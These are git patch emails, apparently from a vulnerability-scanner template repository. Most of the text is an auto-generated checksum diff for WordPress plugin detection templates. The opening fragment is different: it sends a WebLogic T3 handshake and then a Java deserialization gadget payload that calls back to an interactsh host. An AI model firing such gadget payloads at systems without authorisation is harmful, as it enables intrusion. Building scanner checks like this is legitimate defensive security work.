- data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" read: 1024 - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" + host: - "{{Hostname}}" - "{{Host}}:7001" + read-size: 4 matchers: - type: word From 53c957b0674265a0e67c69e30fa1098857a50403 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Jul 2024 07:45:16 +0000 Subject: [PATCH 049/247] Auto Generated New Template Addition List [Thu Jul 11 07:45:16 UTC 2024] :robot: From f6b5166caa09350ccf2d7d40f1d105b5b46db667 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 07:45:30 +0000 Subject: [PATCH 050/247] Auto Generated Templates Checksum [Thu Jul 11 07:45:30 UTC 2024] :robot: --- templates-checksum.txt | 404 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5b3ffd1130e..c4980c8234e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7273,228 +7273,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:eb91b36b5b6509efa668623ebd2ae894407af24b +http/technologies/wordpress/plugins/add-to-any.yaml:8ffa5d998f94bbe8542261afa185507ba564b3b7 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:7f76d64453450d56cda368101bfaf6277bef4f7e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:55d0ddb31c997897daf3b3c21d5e188d64c57ff1 +http/technologies/wordpress/plugins/akismet.yaml:f384beb058b0d5639806a0389da7c8f3fe6dde35 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:83b6097fa8ac5f5910a9c0832cf379e8bebb0801 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:f0c45884643adc637c219938f6f44702b3f69455 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:be9d732188a59614f43d74abe292216b14285b5d +http/technologies/wordpress/plugins/amp.yaml:f63acc06003b29d394316675972db194fb13b32a +http/technologies/wordpress/plugins/antispam-bee.yaml:7352f0ed7d412b6728120eb0e9a99fce503c014c +http/technologies/wordpress/plugins/astra-sites.yaml:861e7431ed2603a0c918c9af342493eb1b4db6be http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:fa24a6696b53dd4fd9ad8a801d5a2beea1bbbca8 +http/technologies/wordpress/plugins/backwpup.yaml:1c60c2bbe2a48041cc5c0e7e82fbf8a5b1502d8b +http/technologies/wordpress/plugins/better-search-replace.yaml:6e1b1dec1edf44b566eaa3e22b89822ee33b5867 +http/technologies/wordpress/plugins/better-wp-security.yaml:cf8e85c94f39964ba400f05790f4ae8fbc3992ef +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:04df46b72fffdfed0c986c8408f253eae3a7e4cb +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:036d6068efa37d265c4c4586ac67cab31092fc85 +http/technologies/wordpress/plugins/breeze.yaml:0291aef183d043ef508a76d2c5b6b5e7656d8bcc +http/technologies/wordpress/plugins/broken-link-checker.yaml:140b8dbaebd5abb1b99287f1f454e552bbec4e58 +http/technologies/wordpress/plugins/chaty.yaml:5b0e04d4aef22797857773de881fff55e38245bd +http/technologies/wordpress/plugins/child-theme-configurator.yaml:4e13edf9445bd2945b9c6939b72e981645e330e3 +http/technologies/wordpress/plugins/classic-editor.yaml:409a814ea9c183599db89e4c70e40321fa39a612 +http/technologies/wordpress/plugins/classic-widgets.yaml:f06e5a41e2a8678edf55c7e50c27893b77ec5f4d +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e9c2ef515b6d5d1772031487e275d493bf1617d7 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:f8d3f23c6ce4269bd8b5e8b2b5501d01c264bed3 +http/technologies/wordpress/plugins/coblocks.yaml:c1db3cb2812f0b7f316495dee7f07d8695447801 +http/technologies/wordpress/plugins/code-snippets.yaml:05d0caa3a169bc4e4c0ad56d478cff88cf2caee6 +http/technologies/wordpress/plugins/coming-soon.yaml:514656f9cb7e79a7b5f3981e8049587e43a5107a +http/technologies/wordpress/plugins/complianz-gdpr.yaml:424da6b75af3e4bb58385a1546a89ef333cff08e +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:350de257e1afad32dace578f41e3e7baace42de7 +http/technologies/wordpress/plugins/contact-form-7.yaml:ee0914b3c26085526ed50bd29a84ba7c7bc1544c +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:b5ebe5ea38a33241c1805765d5a3612a65616e91 +http/technologies/wordpress/plugins/cookie-law-info.yaml:c0b3b61dd19872d7b83f4604b1a0d7df34c6b09f +http/technologies/wordpress/plugins/cookie-notice.yaml:6a3f8c598d22104300d7b5981735d67239587cf7 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:df3d0b1ef2a10aa76e87fe94fce5adeec2f2dc36 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:3a955758eb8360653eb3358342fb65767e1b250f +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:5cbe0f96d2f1d5d0592880110b6288291f2bba3e +http/technologies/wordpress/plugins/custom-css-js.yaml:741f148ab54e365b01b7a663e953c0f3c6e14c6f +http/technologies/wordpress/plugins/custom-fonts.yaml:99803b7c90978b26933f8a4e19045f66c680f1a3 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:9aef654ba818644f34d21d6776505e251168bcad +http/technologies/wordpress/plugins/disable-comments.yaml:2ac9fd4993ffda218750ac6f245a6681ad52c481 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:cdae6ff48e0855f3c4c62393afe48c81090c014b +http/technologies/wordpress/plugins/duplicate-page.yaml:a2eea8b3bd8691978ef065f5e468e9662d5458f9 +http/technologies/wordpress/plugins/duplicate-post.yaml:1aafdc451a9648e15f39855dc3092071f6acccd9 +http/technologies/wordpress/plugins/duplicator.yaml:b6fb5be7d06fce0cb2b4ce10cc9432b1ac147bcf +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9365a26d4680e8205d074a5e87e1bc1b994931e1 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:ad9c7dc0a85622e0d17426fab559a2bec8d7b4df +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:f061268c8c2ddfa33d288a9b6f06baa68bc95fd6 +http/technologies/wordpress/plugins/elementor.yaml:dd416f45b226aa3df3619b547d64ee7223d0cfdb +http/technologies/wordpress/plugins/elementskit-lite.yaml:06ea232b62d2d5ca9b8188f4c2cb1b7296d29738 +http/technologies/wordpress/plugins/enable-media-replace.yaml:d41015f83b07d3c7e7e19ae489cc7e9da8764340 +http/technologies/wordpress/plugins/envato-elements.yaml:c1d70913abab38b9527bae7ec032dd6c4567819e +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1fd59c8444b0667f371c2c486b6e30d808f2d7be +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:10b4eda4d34911378f2a8ac50d800b2c8b5fdda3 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e3ee5e3911fcc537e07cdba18028d1ad51fdfcd8 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:ea712f34dab61e9d58a783f5d989947586c91691 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:6b21a1ae142f7aaa507695d3861f3cf2d7ed09ba +http/technologies/wordpress/plugins/flamingo.yaml:c1c48858508e2fcf27b3f10028cec54054d8eece +http/technologies/wordpress/plugins/fluentform.yaml:05de017730f2ffafa1470b0fd2fdcb57f7284a56 +http/technologies/wordpress/plugins/font-awesome.yaml:a81fff1cf9013e5b5b1abd2d7fb4a02be53e6674 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6800f411b8e15a0b7c0f78e76130089871596d7b +http/technologies/wordpress/plugins/formidable.yaml:e044dd1193108abca7b178e45cc62168e4ae4001 +http/technologies/wordpress/plugins/forminator.yaml:e85ed4a7140f5c85b7d34258f46e2133da77a6f6 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:1f46795a627e1257129f6ce26f33a9d1837956fd +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:416b2e2fec76d7041ab31b5c82dfbe7aaa59ba06 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:91fe7f11832694290aa760f9f1d66a93b65c9f55 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:879733d5c41d1a28e2114bc7f870ef3b5615a048 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:499be2a3b007a57c469b46a7a816222db088c7ef +http/technologies/wordpress/plugins/google-site-kit.yaml:135bf5b7bb6964379cb7bedfcd34bef020ba6fe3 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:0fc7b113f73f24b95883642572f097c34c744636 +http/technologies/wordpress/plugins/gtranslate.yaml:8dc46ccab8f342436ea8fce5cdaa11596d96abf1 +http/technologies/wordpress/plugins/gutenberg.yaml:2fe5575301a5472f0c393221f94fa6f382efc945 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:50a720c2fa26a5eb40fd133e71bcf413c464bd56 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:aa6a3b5d5b69422fa93c8df3724a459f0db6fcf2 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:cac2096b2847fb4d1748b74068f63cd152ab59ef +http/technologies/wordpress/plugins/header-footer.yaml:9b32350998c41f8bda175e4e516dd16f62ceeb65 +http/technologies/wordpress/plugins/health-check.yaml:a39edb121f5a60959afdf55ab4818dde81074882 +http/technologies/wordpress/plugins/hello-dolly.yaml:642950239daf4068af776c3f04923887c0578c26 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:05cc075296d23547ec3e0a02e39e9885c76c125e +http/technologies/wordpress/plugins/hostinger.yaml:fb39e4f64d78c9946a2896fce8aaaef30431b813 +http/technologies/wordpress/plugins/image-optimization.yaml:0d5a3fc198f7b46301e3bb0e6500cead0ffa2668 +http/technologies/wordpress/plugins/imagify.yaml:f4cb88061780d314d0390d3c0dda478340f82067 +http/technologies/wordpress/plugins/imsanity.yaml:62d999d5191b4b5913a329621629fa18d9be632d +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:881dbc74cd4ab6c56b9136fb2605b7edf2696d94 +http/technologies/wordpress/plugins/instagram-feed.yaml:e321aa71e3f468ceb3d25d95ebfc6b1a7ad5b7f2 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:cabb0961e55881cfbd671062d8915e4fe35bb79f http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:973301e82f4b66e2a3d9c9373e38031750df8b5c +http/technologies/wordpress/plugins/jetpack.yaml:c7c44d93c0ef214db5281a1db820cf5f253fb001 +http/technologies/wordpress/plugins/kadence-blocks.yaml:f7449e0776b8f4dfe70fc07401d825bc2d769493 +http/technologies/wordpress/plugins/kirki.yaml:1a5d5c67073c3a65dfdfae88863cf1b625d0cef0 +http/technologies/wordpress/plugins/leadin.yaml:a57be5b766f15c4118487bbf85aaa5f9d990a5da +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:cdb73b22c9b63e19089daa2095ebfc8a71d163c9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:5aa673ccf7c71cf5fe443143a9876521b2552a4f +http/technologies/wordpress/plugins/litespeed-cache.yaml:5a8128e641e8344b9090c04afe1b4a2cb8420688 +http/technologies/wordpress/plugins/loco-translate.yaml:06ed35a7db9a2ba413ca1dc63e3c3430ddf1a13b +http/technologies/wordpress/plugins/loginizer.yaml:efb3950280f09ed738f13d5f52667e5d31ec2c64 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:2276f5b154a735ed543811455256c820cdfdfbb6 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:5920f1c9739edf2b8b46135805dc2a52dcb12ff3 +http/technologies/wordpress/plugins/mailpoet.yaml:0dcc363e2a262ddb6e4c394d12532d63d5c311b9 +http/technologies/wordpress/plugins/maintenance.yaml:49abee4d4f036c0279d16c00fb32a957a6292f70 +http/technologies/wordpress/plugins/mainwp-child.yaml:52950c04c1fae432a28871ebef71082390424de4 +http/technologies/wordpress/plugins/malcare-security.yaml:b08abc793f4a9245801a8e6cd82113b2aaba5f06 +http/technologies/wordpress/plugins/megamenu.yaml:d57d31f48187f38689f2b6c0d8e520da0992fc55 +http/technologies/wordpress/plugins/members.yaml:9b49abe3e057ff23970b125b0984f3a7b3879b40 +http/technologies/wordpress/plugins/meta-box.yaml:017bf6896490fe53c633a85db0ed4e071d364b0b +http/technologies/wordpress/plugins/metform.yaml:40201e4b7667b9b604246613c6cb381b3afe1475 +http/technologies/wordpress/plugins/ml-slider.yaml:1470342bc833b6a3f1811c74c42996ea89a305cc +http/technologies/wordpress/plugins/newsletter.yaml:d7fe1b9ff0d791ee525c6415188c6399c2ca5971 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:8fb9406d85278497c39fba015c21b4c87f83f9ce +http/technologies/wordpress/plugins/nextgen-gallery.yaml:1f314519cdec97b332bc1a7fcc3e8835059ec539 +http/technologies/wordpress/plugins/ninja-forms.yaml:c8bf3825a72dcd1e6853a2f29802bdf184dbd32d +http/technologies/wordpress/plugins/ocean-extra.yaml:aa1ed8e4449d437e8b7d177c0bf3d0162034beb9 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:069f9ad5116f995ff97a19aeca9eea0a69b4a625 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:257efd7e25f56e64673fb929055dfaf0b304e900 +http/technologies/wordpress/plugins/optinmonster.yaml:ebaf92eddfb68d8d5213c93f6ea92237a8c11fa8 +http/technologies/wordpress/plugins/otter-blocks.yaml:eb71a797e632c36b98cfebaf2cefad7d3aea8a33 +http/technologies/wordpress/plugins/password-protected.yaml:9d5751f0408fe46ae51b6552769ba250473d2220 +http/technologies/wordpress/plugins/pdf-embedder.yaml:12f16694ce62694ff01c133c5bcd9b3e3f5a114f http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:0fdd2c8c5ad969f8adc5ca30e907b50584fb0255 +http/technologies/wordpress/plugins/pixelyoursite.yaml:9cbaff326ba57d4a763fd69988fb986bc415ab44 +http/technologies/wordpress/plugins/polylang.yaml:c6a9e363febc74794654f805bc88849810ae5126 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 